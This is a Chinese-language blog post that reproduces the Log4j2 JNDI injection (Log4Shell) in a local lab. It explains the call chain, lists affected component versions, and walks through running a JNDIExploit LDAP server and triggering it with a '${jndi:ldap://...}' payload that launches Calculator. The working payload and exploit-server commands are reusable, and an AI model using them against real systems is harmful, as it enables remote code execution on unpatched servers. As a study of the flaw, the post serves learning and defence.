log4j2漏洞复现

原理

log4j2组件未正确处理用户输入,日志信息经过如下调用链后进入JndiLookup.lookup造成了典型的jndi注入问题:

* logger.error()--->AbstractLogger.tryLogMessage.log()--->org.apache.logging.log4j.core.Loggger.log
* ---->DefaultReliabilityStrategy.log()--->LoggerConfig.log()--->appender.control.callAppender()
* ---->AppenderControl.tryCallAppender()--->AbstractOutputStreamAppender.append()--->PatternLayout.encode()
* --->MessagePatternConverter.format()--->StrSubstitutor.replace()--->StrSubstitutor.subtute()--->resolveVariable()--->JndiManager.lookup

受影响的组件

组件名称 版本
Apache Struts2 全版本
ElasticSearch 5.x,6.x,7.x,8.0.0beta1,8.0.0alpha1和8.0.0alpha2
Logstash 5.0.0至最新
Apache Flink 1.11.0-rc1 到 1.14.0
Apache Druid 0.7.x以上
Hadoop Hive 2.x和3.x
Apache Log4j SLF4J Binding '2.14.1', '2.14.0', '2.13.3', '2.13.2', '2.13.1', '2.13.0', '2.12.1', '2.12.0', '2.11.2', '2.11.1', '2.11.0', '2.10.0', '2.9.1', '2.9.0', '2.8.2', '2.8.1', '2.8', '2.7', '2.6.2', '2.6.1', '2.6', '2.5', '2.4.1', '2.4', '2.3', '2.2', '2.1', '2.0.2', '2.0.1', '2.0', '2.0-rc2', '2.0-rc1', '2.0-beta9', '2.0-beta8', '2.0-beta7', '2.0-beta6', '2.0-beta5'
Spring Boot '2.6.1', '2.6.0', '2.5.7', '2.5.6', '2.5.5', '2.5.4', '2.5.3', '2.5.2', '2.5.1', '2.5.0', '2.4.13', '2.4.12', '2.4.11', '2.4.10', '2.4.9', '2.4.8', '2.4.7', '2.4.6', '2.4.5', '2.4.4', '2.4.3', '2.4.2', '2.4.1', '2.4.0', '2.3.12.RELEASE', '2.3.11.RELEASE', '2.3.10.RELEASE', '2.3.9.RELEASE', '2.3.8.RELEASE', '2.3.7.RELEASE', '2.3.6.RELEASE', '2.3.5.RELEASE', '2.3.4.RELEASE', '2.3.3.RELEASE', '2.3.2.RELEASE', '2.3.1.RELEASE', '2.3.0.RELEASE', '2.2.13.RELEASE', '2.2.12.RELEASE', '2.2.11.RELEASE', '2.2.10.RELEASE', '2.2.9.RELEASE', '2.2.8.RELEASE', '2.2.7.RELEASE', '2.2.6.RELEASE', '2.2.5.RELEASE', '2.2.4.RELEASE', '2.2.3.RELEASE', '2.2.2.RELEASE', '2.2.1.RELEASE', '2.2.0.RELEASE', '2.1.18.RELEASE', '2.1.17.RELEASE', '2.1.16.RELEASE', '2.1.15.RELEASE', '2.1.14.RELEASE', '2.1.13.RELEASE', '2.1.12.RELEASE', '2.1.11.RELEASE', '2.1.10.RELEASE', '2.1.9.RELEASE', '2.1.8.RELEASE', '2.1.7.RELEASE', '2.1.6.RELEASE', '2.1.5.RELEASE', '2.1.4.RELEASE', '2.1.3.RELEASE', '2.1.2.RELEASE', '2.1.1.RELEASE', '2.1.0.RELEASE', '2.0.9.RELEASE', '2.0.8.RELEASE', '2.0.7.RELEASE', '2.0.6.RELEASE', '2.0.5.RELEASE', '2.0.4.RELEASE', '2.0.3.RELEASE', '2.0.2.RELEASE', '2.0.1.RELEASE', '2.0.0.RELEASE', '1.5.22.RELEASE', '1.5.21.RELEASE', '1.5.20.RELEASE', '1.5.19.RELEASE', '1.5.18.RELEASE', '1.5.17.RELEASE', '1.5.16.RELEASE', '1.5.15.RELEASE', '1.5.14.RELEASE', '1.5.13.RELEASE', '1.5.12.RELEASE', '1.5.11.RELEASE', '1.5.10.RELEASE', '1.5.9.RELEASE', '1.5.8.RELEASE', '1.5.7.RELEASE', '1.5.6.RELEASE', '1.5.5.RELEASE', '1.5.4.RELEASE', '1.5.3.RELEASE', '1.5.2.RELEASE', '1.5.1.RELEASE', '1.5.0.RELEASE', '1.4.7.RELEASE', '1.4.6.RELEASE', '1.4.5.RELEASE', '1.4.4.RELEASE', '1.4.3.RELEASE', '1.4.2.RELEASE', '1.4.1.RELEASE', '1.4.0.RELEASE', '1.3.8.RELEASE', '1.3.7.RELEASE', '1.3.6.RELEASE', '1.3.5.RELEASE', '1.3.4.RELEASE', '1.3.3.RELEASE', '1.3.2.RELEASE', '1.3.1.RELEASE', '1.3.0.RELEASE', '1.2.8.RELEASE', '1.2.7.RELEASE', '1.2.6.RELEASE', '1.2.5.RELEASE', '1.2.4.RELEASE', '1.2.3.RELEASE', '1.2.2.RELEASE', '1.2.1.RELEASE', '1.2.0.RELEASE', '1.1.12.RELEASE', '1.1.11.RELEASE', '1.1.10.RELEASE', '1.1.9.RELEASE', '1.1.8.RELEASE', '1.1.7.RELEASE', '1.1.6.RELEASE', '1.1.5.RELEASE', '1.1.4.RELEASE', '1.1.3.RELEASE', '1.1.2.RELEASE', '1.1.1.RELEASE', '1.1.0.RELEASE', '1.0.2.RELEASE', '1.0.1.RELEASE', '1.0.0.RELEASE'
Camel :: Core '3.13.0', '3.12.0', '3.11.4', '3.11.3', '3.11.2', '3.11.1', '3.11.0', '3.10.0', '3.9.0', '3.8.0', '3.7.6', '3.7.5', '3.7.4', '3.7.3', '3.7.2', '3.7.1', '3.7.0', '3.6.0', '3.5.0', '3.4.6', '3.4.5', '3.4.4', '3.4.3', '3.4.2', '3.4.1', '3.4.0', '3.3.0', '3.2.0', '3.1.0', '3.0.1', '3.0.0', '2.25.4', '2.25.3', '2.25.2', '2.25.1', '2.25.0', '2.24.3', '2.24.2', '2.24.1', '2.24.0', '2.23.4', '2.23.3', '2.23.2', '2.23.1', '2.23.0', '2.22.5', '2.22.4', '2.22.3', '2.22.2', '2.22.1', '2.22.0', '2.21.5', '2.21.4', '2.21.3', '2.21.2', '2.21.1', '2.21.0', '2.20.4', '2.20.3', '2.20.2', '2.20.1', '2.20.0', '2.19.5', '2.19.4', '2.19.3', '2.19.2', '2.19.1', '2.19.0', '2.18.5', '2.18.4', '2.18.3', '2.18.2', '2.18.1', '2.18.0', '2.17.7', '2.17.6', '2.17.5', '2.17.4', '2.17.3', '2.17.2', '2.17.1', '2.17.0', '2.16.5', '2.16.4', '2.16.3', '2.16.2', '2.16.1', '2.16.0', '2.15.6', '2.15.5', '2.15.4', '2.15.3', '2.15.2', '2.15.1', '2.15.0', '2.14.4', '2.14.3', '2.14.2', '2.14.1', '2.14.0', '2.13.4', '2.13.3', '2.13.2', '2.13.1', '2.13.0', '2.12.5', '2.12.4', '2.12.3', '2.12.2', '2.12.1', '2.12.0', '2.11.4', '2.11.3', '2.11.2', '2.11.1', '2.11.0', '2.10.7', '2.10.6', '2.10.5', '2.10.4', '2.10.3', '2.10.2', '2.10.1', '2.10.0', '2.9.8', '2.9.7', '2.9.6', '2.9.5', '2.9.4', '2.9.3', '2.9.2', '2.9.1', '2.9.0', '2.8.6', '2.8.5', '2.8.4', '2.8.3', '2.8.2', '2.8.1', '2.8.0', '2.7.5', '2.7.4', '2.7.3', '2.7.2', '2.7.1', '2.7.0', '2.6.0', '2.5.0', '2.4.0', '2.3.0', '2.2.0', '2.1.0', '2.0.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1', '1.6.0', '1.5.0', '1.4.0', '1.3.0', '1.2.0', '1.1.0', '1.0.0', '3.0.0-M4', '3.0.0-M3', '3.0.0-M2', '3.0.0-M1', '2.0-M3', '2.0-M2', '2.0-M1', '3.0.0-RC3', '3.0.0-RC2', '3.0.0-RC1', '2.9.0-RC1'
JUnit Vintage Engine '5.8.2', '5.8.1', '5.8.0', '5.7.2', '5.7.1', '5.7.0', '5.6.3', '5.6.2', '5.6.1', '5.6.0', '5.5.2', '5.5.1', '5.5.0', '5.4.2', '5.4.1', '5.4.0', '5.3.2', '5.3.1', '5.3.0', '5.2.0', '5.1.1', '5.1.0', '4.12.3', '4.12.2', '4.12.1', '4.12.0', '5.8.0-M1', '5.7.0-M1', '5.6.0-M1', '5.5.0-M1', '5.4.0-M1', '5.3.0-M1', '5.2.0-M1', '5.1.0-M2', '5.1.0-M1', '4.12.0-M6', '4.12.0-M5', '4.12.0-M4', '4.12.0-M3', '4.12.0-M2', '4.12.0-M1', '5.8.0-RC1', '5.7.0-RC1', '5.6.0-RC1', '5.5.0-RC2', '5.5.0-RC1', '5.4.0-RC2', '5.4.0-RC1', '5.3.0-RC1', '5.2.0-RC1', '5.1.0-RC1', '4.12.0-RC3', '4.12.0-RC2', '4.12.0-RC1'
JBoss Logging 3 '3.4.2.Final', '3.4.1.Final', '3.4.0.Final', '3.3.3.Final', '3.3.2.Final', '3.3.1.Final', '3.3.0.Final', '3.2.1.Final', '3.2.0.Final', '3.1.0.CR2', '3.1.0.CR1', '3.0.0.CR1', '3.3.0.Beta1', '3.2.0.Beta1', '3.1.0.Beta3', '3.1.0.Beta2', '3.1.0.Beta1', '3.0.0.Beta5', '3.0.0.Beta4', '3.0.0.Beta3', '3.0.0.Beta2', '3.0.0.Beta1'
HikariCP '5.0.0', '4.0.3', '4.0.2', '4.0.1', '4.0.0', '3.4.5', '3.4.4', '3.4.3', '3.4.2', '3.4.1', '3.4.0', '3.3.1', '3.3.0', '3.2.0', '3.1.0', '3.0.0', '2.7.9', '2.7.8', '2.7.7', '2.7.6', '2.7.5', '2.7.4', '2.7.3', '2.7.2', '2.7.1', '2.7.0', '2.6.3', '2.6.2', '2.6.1', '2.6.0', '2.5.1', '2.5.0', '2.4.7', '2.4.6', '2.4.5', '2.4.4', '2.4.3', '2.4.2', '2.4.1', '2.4.0', '2.3.13', '2.3.12', '2.3.11', '2.3.10', '2.3.9', '2.3.8', '2.3.7', '2.3.6', '2.3.5', '2.3.4', '2.3.3', '2.3.2', '2.3.1', '2.3.0', '2.2.5', '2.2.4', '2.2.3', '2.2.2', '2.2.1', '2.2.0', '2.1.0', '2.0.1', '2.0.0', '1.4.0', '1.3.9', '1.3.8', '1.3.7', '1.3.6', '1.3.5', '1.3.4', '1.3.3', '1.3.2', '1.3.1', '1.3.0', '1.2.9', '1.2.8', '1.2.7', '1.2.6', '1.2.5', '1.2.4', '1.2.3', '1.2.2', '1.2.1', '1.1.9', '1.1.8', '1.1.7', '1.1.6', '1.1.5', '1.1.4', '1.1.3'
Logging '1.1.0', '1.0.0', '0.6.0', '0.5.0', '0.4.1', '0.4.0', '0.3.1', '0.3.0', '0.2.6', '0.2.4', '0.2.3', '0.2.2', '0.2.0', '0.1.2', '0.1.1', '0.1.0', '0.5.0-alpha.1', '0.5.0-alpha'
Jedis '3.7.0', '3.6.3', '3.6.2', '3.6.1', '3.6.0', '3.5.2', '3.5.1', '3.5.0', '3.4.1', '3.4.0', '3.3.0', '3.2.0', '3.1.0', '3.0.1', '3.0.0', '2.10.2', '2.10.1', '2.10.0', '2.9.3', '2.9.2', '2.9.1', '2.9.0', '2.8.2', '2.8.1', '2.8.0', '2.7.3', '2.7.2', '2.7.1', '2.7.0', '2.6.3', '2.6.2', '2.6.1', '2.6.0', '2.5.2', '2.5.1', '2.5.0', '2.4.2', '2.4.1', '2.4.0', '2.3.1', '2.3.0', '2.2.1', '2.2.0', '2.1.0', '2.0.0', '1.5.2', '1.5.1', '1.5.0', '1.4.0', '1.3.1', '1.3.0', 'jedis-3.6.2', '3.1.0-m4', '3.1.0-m3', '3.1.0-m2', '3.1.0-m1', '3.0.0-m1', '2.10.0-m1', '3.7.0-RC1', '3.6.0-RC1', '3.1.0-rc2', '3.1.0-rc', '3.0.1-rc1', '3.0.0-rc1', '2.10.0-rc1', '1.5.0-RC2', '1.5.0-RC1', '4.0.0-beta4', '4.0.0-beta3', '4.0.0-beta2', '4.0.0-beta1'
WSO2 Carbon Kernel Core '5.2.13', '5.2.8', '5.2.7', '5.2.6', '5.2.5', '5.2.4', '5.2.3', '5.2.2', '5.2.1', '4.6.2', '4.6.1', '4.6.0', '4.5.1', '4.4.37', '4.4.36', '4.4.35', '4.4.34', '4.4.33', '4.4.32', '4.4.31', '4.4.30', '4.4.29', '4.4.28', '4.4.27', '4.4.26', '4.4.25', '4.4.24', '4.4.23', '4.4.22', '4.4.21', '4.4.20', '4.4.19', '4.7.0-m6', '4.7.0-m5', '4.7.0-m4', '4.7.0-m3', '4.7.0-m2', '4.7.0-m1', '4.6.3-m5', '4.6.3-m4', '4.6.3-m3', '4.6.3-m2', '4.6.3-m1', '4.6.2-m9', '4.6.2-m8', '4.6.2-m7', '4.6.2-m6', '4.6.2-m5', '4.6.2-m4', '4.6.2-m3', '4.6.2-m2', '4.6.2-m1', '4.6.1-m8', '4.6.1-m7', '4.6.1-m6', '4.6.1-m5', '4.6.1-m4', '4.6.1-m3', '4.6.1-m2', '4.6.1-m1', '4.6.1-beta2', '4.6.1-beta', '4.6.0-beta2', '4.6.1-alpha3', '4.6.1-alpha2', '4.6.1-alpha', '4.6.0-alpha2', '4.6.0-alpha'

参考资料

https://github.com/Yihsiwei/Log4j-exp

攻击原理图

image-20220117015452097

本地复现步骤

复现环境

macOS Monterey 12.0.1、idea2021.1.3、java version "1.8.0_281"

  • 1、下载Log4j-exp

    https://pan.baidu.com/s/1lxXt-27-i7I_dOUACphVtQ 提取码: nkc5

    目录结构如下:

image-20220103032453033
  • 2、开启本地jndi服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.1.49

image-20220103032326949

  • 3、导入IDEA,修改log4jRCE文件,并构建工件

打开IDEA

3122138279

修改log4jRCE,添加payload

22987086
logger.error("${jndi:ldap://192.168.1.49:1389/Basic/Command/open -a  Calculator.app}");

编译jar包

3299580725-20220103035247600

运行

java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar Log4j-rce.jar

复现成功

image-20220103033743511
最后修改:2022 年 01 月 28 日 08 : 33 PM
如果觉得我的文章对你有用,那就请作者喝杯奶茶吧~